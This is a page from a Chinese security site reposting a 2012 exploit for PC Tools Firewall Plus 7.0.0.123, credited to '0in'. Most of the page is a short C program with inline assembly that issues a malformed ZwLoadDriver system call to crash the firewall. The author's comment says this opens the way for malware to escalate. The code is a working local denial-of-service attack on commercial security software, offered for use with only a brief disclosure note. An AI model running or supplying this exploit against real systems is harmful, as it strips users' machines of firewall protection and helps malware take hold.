首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PC Tools Firewall Plus 7.0.0.123 Local DoS
来源:vfocus.net 作者:0in 发布时间:2012-07-02  
/*
Exploit Title: PC Tools Firewall Plus Local DoS
Version: 7.0.0.123
Author: 0in (Maksymilian Motyl)
Software Link: www.pctools.com
Tested on: Windows XP SP3
Vendor was notified 25.06.2012 - No reply
*/
 
// After executing this small code, PC Tools Firewall crashes so it opens the way to malware escalation
#include "stdafx.h"
#include <Windows.h>
  
int _tmain(int argc, _TCHAR* argv[])
{
    for(int i=0;i<512;i++)
        printf(".");
     _asm
     {
          push 0xffffff
          mov eax,61h ;          ZwLoadDriver
          mov edx,7FFE0300h ; ntdll.KiFastSystemCall
          call dword ptr ds:[edx]
  
     }
  
  
     return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 2.6.18-374 Local
·Zoom Player 4.51 Standard - ".
·Apple QuickTime TeXML Stack Bu
·python-wrapper untrusted searc
·Symantec PcAnywhere 12.5.0 Log
·Chrome Engine 4 Denial of Serv
·Real Player 10 GOLD - Exceptio
·xArrow <= 3.2 multiple vulnera
·Linux 3.x.x Executable File Re
·Novell GroupWise Messenger <=
·VLC 2.0.1 - .avi playlist plug
·Serv-U FTP <= 11.1.0.3 possibl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved